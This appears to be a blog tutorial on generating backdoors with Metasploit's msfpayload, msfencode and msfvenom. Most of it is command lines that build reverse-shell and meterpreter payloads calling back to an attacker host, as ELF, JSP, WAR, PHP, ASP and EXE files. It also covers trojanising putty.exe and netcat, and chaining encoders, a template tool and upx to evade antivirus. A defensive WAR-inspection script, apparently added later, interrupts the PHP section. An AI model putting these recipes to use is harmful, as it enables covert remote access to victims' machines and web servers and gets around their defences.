Generating backdoors with msfpayload and msfencode

These are notes I wrote some time ago; I did not have an environment to test them thoroughly. This post covers generating a backdoor with msfpayload, then running the payload through msfencode (possibly with several encoders) so that it evades some antivirus products.

msfpayload and msfencode options
Run msfpayload -h to see its options:

    Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
    OPTIONS:
        -h    Help banner
        -l    List available payloads

The output formats used in this post:

    O -- show payload information
    R -- output raw data, which can be piped into another program such as msfencode, or redirected to a file
    C -- output as a C program

Run msfencode -h to see its options:

    root@bt:/opt/metasploit/msf3# msfencode -h
    Usage: /opt/metasploit/msf3/msfencode <options>
    OPTIONS:
        -a <opt>  The architecture to encode as
        -b <opt>  The list of characters to avoid: '\x00\xff'    // characters to avoid
        -c <opt>  The number of times to encode the data         // number of encoding iterations
        -d <opt>  Specify the directory in which to look for EXE templates
        -e <opt>  The encoder to use                             // which encoder to use
        -h        Help banner
        -i <opt>  Encode the contents of the supplied file path
        -k        Keep template working; run payload in new thread (use with -x)
        -l        List available encoders                        // list all available encoders
        -m <opt>  Specifies an additional module search path
        -n        Dump encoder information
        -o <opt>  The output file                                // output file
        -p <opt>  The platform to encode for
        -s <opt>  The maximum size of the encoded data
        -t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war    // output file format
        -v        Increase verbosity
        -x <opt>  Specify an alternate executable template

List the available encoders:

    root@bt:/opt/metasploit/msf3# msfencode -l

    Framework Encoders
    ==================

        Name                      Rank       Description
        ----                      ----       -----------
        cmd/generic_sh            good       Generic Shell Variable Substitution Command Encoder
        cmd/ifs                   low        Generic ${IFS} Substitution Command Encoder
        cmd/printf_php_mq         manual     printf(1) via PHP magic_quotes Utility Command Encoder
        generic/none              normal     The "none" Encoder
        mipsbe/longxor            normal     XOR Encoder
        mipsle/longxor            normal     XOR Encoder
        php/base64                great      PHP Base64 encoder
        ppc/longxor               normal     PPC LongXOR Encoder
        ppc/longxor_tag           normal     PPC LongXOR Encoder
        sparc/longxor_tag         normal     SPARC DWORD XOR Encoder
        x64/xor                   normal     XOR Encoder
        x86/alpha_mixed           low        Alpha2 Alphanumeric Mixedcase Encoder
        x86/alpha_upper           low        Alpha2 Alphanumeric Uppercase Encoder
        x86/avoid_utf8_tolower    manual     Avoid UTF8/tolower
        x86/call4_dword_xor       normal     Call+4 Dword XOR Encoder
        x86/context_cpuid         manual     CPUID-based Context Keyed Payload Encoder
        x86/context_stat          manual     stat(2)-based Context Keyed Payload Encoder
        x86/context_time          manual     time(2)-based Context Keyed Payload Encoder
        x86/countdown             normal     Single-byte XOR Countdown Encoder
        x86/fnstenv_mov           normal     Variable-length Fnstenv/mov Dword XOR Encoder
        x86/jmp_call_additive     normal     Jump/Call XOR Additive Feedback Encoder
        x86/nonalpha              low        Non-Alpha Encoder
        x86/nonupper              low        Non-Upper Encoder
        x86/shikata_ga_nai        excellent  Polymorphic XOR Additive Feedback Encoder
        x86/single_static_bit     manual     Single Static Bit
        x86/unicode_mixed         manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
        x86/unicode_upper         manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

Backdoor types
msfpayload can produce asp, aspx, php, jsp, war, exe and other formats. The usage shown below has not been tested case by case.

Generating a Linux backdoor with msfpayload
    root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2
    Created by msfpayload (http://www.metasploit.com).
    Payload: linux/x86/shell_reverse_tcp
     Length: 71
    Options: {"LHOST"=>"192.168.7.102", "LPORT"=>"5555"}

Run linux2 on the target machine and listen on the port locally; either metasploit or nc will do. The test is shown in the figure below:
Bind the payload to an existing executable so that both run, e.g. netcat:

    root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
    [*] x86/alpha_mixed succeeded with size 204 (iteration=1)

For a more capable payload such as meterpreter, search with msfpayload -l | grep linux and pick the one that suits you.

Generating jsp and war backdoors with msfpayload
    root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp

Generate a backdoor in war format:

    root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war
    Created by msfpayload (http://www.metasploit.com).
    Payload: linux/x86/shell_reverse_tcp
     Length: 71
    Options: {"LHOST"=>"10.0.0.1", "LPORT"=>"5555"}
    root@bt:~# unzip door.war
    Archive:  door.war
      inflating: META-INF/MANIFEST.MF
       creating: WEB-INF/
      inflating: WEB-INF/web.xml
      inflating: sbkuvbujlbr.jsp
      inflating: sWDYKoedyqBMERb.txt
    root@bt:~#

Generating a php backdoor with msfpayload
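The unzip listing above is what such a generated war looks like from the receiving end: a root-level JSP with a random name that nothing in web.xml points to, plus a stray .txt. As an added example (my own code, not part of the original post or of Metasploit), the script below inventories a war archive and flags entries with those traits before deployment. The sample archive is constructed in memory to mirror the listing above with placeholder contents, and the "machine-generated name" rule is a heuristic I am assuming, not something the post states.

```python
import io
import re
import zipfile


def build_sample_war() -> bytes:
    """Constructed sample mirroring the 'unzip door.war' listing in the post.

    Entry contents are harmless placeholders, not payload bytes.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("WEB-INF/web.xml", "<web-app></web-app>\n")
        zf.writestr("sbkuvbujlbr.jsp", "<%-- placeholder --%>\n")
        zf.writestr("sWDYKoedyqBMERb.txt", "placeholder\n")
    return buf.getvalue()


def looks_generated(name: str) -> bool:
    """Heuristic (my assumption): a file stem made only of letters, at least
    eight long, containing a run of four or more non-vowels, reads as
    machine-generated rather than as a word a developer would choose."""
    stem = name.rsplit("/", 1)[-1].rsplit(".", 1)[0]
    if not re.fullmatch(r"[A-Za-z]{8,}", stem):
        return False
    return re.search(r"[^aeiouAEIOU]{4,}", stem) is not None


def inspect_war(data: bytes) -> dict:
    """Return {entry_name: [reasons]} for entries that deserve a second look."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        web_xml = ""
        if "WEB-INF/web.xml" in names:
            web_xml = zf.read("WEB-INF/web.xml").decode("utf-8", "replace")
        for name in names:
            if name.endswith("/"):          # directory entry
                continue
            at_root = "/" not in name
            reasons = []
            # A JSP at the archive root that web.xml never mentions is
            # reachable by URL yet invisible to the deployment descriptor.
            if at_root and name.lower().endswith(".jsp") and name not in web_xml:
                reasons.append("root-level JSP not referenced from web.xml")
            if at_root and looks_generated(name):
                reasons.append("machine-generated-looking filename")
            if reasons:
                findings[name] = reasons
    return findings


if __name__ == "__main__":
    for entry, why in inspect_war(build_sample_war()).items():
        print(entry, "->", "; ".join(why))
```

Run it against a real archive by replacing build_sample_war() with the bytes of the war file; a clean build from your own project should produce no findings, while the sample above flags both root-level entries.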
    root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php
    [*] php/base64 succeeded with size 1779 (iteration=1)

If the generated file has no PHP opening and closing tags at the start and end, open base64php.php in gedit or vim and add them by hand; otherwise it will not work. See the figure:
Generating asp and aspx backdoors with msfpayload
    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t asp -o door2.asp
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t aspx -o door.aspx
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

Generating an exe backdoor with msfpayload
    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe
    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 -k -x /root/putty.exe -o /root/Desktop/puttydoor.exe
    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 X > shell.bin
    root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=10.0.0.1 LPORT=4443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o door.exe

msfpayload tips
When the target is on an internal network, commonly chosen payloads include:

    root@bt:~# msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o allports.exe
    root@bt:~# msfpayload windows/meterpreter/reverse_http LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o httpports.exe

Antivirus sandbox evasion with ultimate-payload.pl:

    $ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe
    [*ultimate] Waiting for payload from STDIN
    [*ultimate] Payload: read (size: 367)
    [*ultimate] Payload: encode (new size: 1161)
    [*ultimate] Template: read 94720 bytes from file
    [*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928
    [*ultimate] Output: add the begin of the template (size: 36928)
    [*ultimate] Output: add the encoded payload (size: 1161)
    [*ultimate] Output: add the end of the template (size: 18502)
    [*ultimate] File '/tmp/payload.exe' generated (size: 94720)

reverse_https with basic authentication against a proxy:

    msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe

The generated payload can also be packed, e.g. with upx.

Downloads: ultimate-payload.pl, reverse_https_proxy_basicauth
PS: this is only a brief introduction to usage; you will need to test the details yourselves. To view the shellcode, use the C output format. If there are mistakes, please leave a comment.